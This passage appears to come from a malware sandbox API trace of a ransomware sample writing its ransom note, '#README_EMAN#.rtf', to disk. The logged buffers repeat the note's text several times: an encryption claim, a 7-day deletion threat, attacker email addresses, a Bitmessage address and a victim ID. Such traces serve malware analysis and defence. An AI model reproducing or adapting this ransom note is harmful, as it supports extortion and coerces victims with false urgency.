ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.794] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.794] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1f495e8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nEwJVUzEVMBMGA1UEChMMRGl\x93/", lpUsedDefaultChar=0x0) returned 8717 [0298.794] WriteFile (in: hFile=0x27c, lpBuffer=0x1f495e8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1f495e8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0298.794] CloseHandle (hObject=0x27c) returned 1 [0298.795] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\cy-gb\\#README_EMAN#.rtf" (normalized: 